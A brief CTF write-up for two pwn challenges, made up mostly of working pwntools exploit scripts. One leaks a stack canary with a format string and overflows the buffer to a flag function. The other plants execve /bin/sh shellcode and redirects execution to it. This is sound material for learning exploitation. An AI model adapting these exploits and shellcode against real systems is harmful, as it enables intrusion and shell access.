These two challenges are basic, so there is not much to say about them.
fo
A format string vulnerability leaks the stack canary; the overflow then restores it and returns to the flag function.
Exp:
from pwn import *
p = remote('node2.hackingfor.fun', 36598)
#p = process('./pwn')
context.log_level = 'debug'
flag = 0x400811                # address of the function that prints the flag
# Leak the canary via the format string; 'aa' marks where the leaked value starts
payload1 = b'aa%17$p'
p.sendline(payload1)
p.recvuntil(b'aa')
canary = int(p.recv(18), 16)   # '0x' + 16 hex digits
print(hex(canary))
# Fill the buffer, put the canary back in place, overwrite saved rbp, return to flag
payload2 = b'\x61' * 0x58 + p64(canary) + p64(0) + p64(flag)
p.sendafter(b'news...\n', payload2)
p.interactive()
sc
Write shellcode into a fixed buffer, then overflow the stack to call it.
exp:
from pwn import *
p = remote('node2.hackingfor.fun', 38251)
#p = process('./pwn')
context.log_level = 'debug'
buf = 0x601080                 # fixed address of the buffer that receives the shellcode
#shell = asm(shellcraft.sh())
# 23-byte execve("/bin//sh", NULL, NULL) shellcode, equivalent to shellcraft.sh()
shell = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
p.sendafter(b'Migic\n', shell)
#gdb.attach(p)
#pause()
# Overflow: three qwords of padding, then the return address pointing at the shellcode
payload = p64(0) * 3 + p64(buf)
p.sendafter(b'Have you finished?\n', payload)
p.interactive()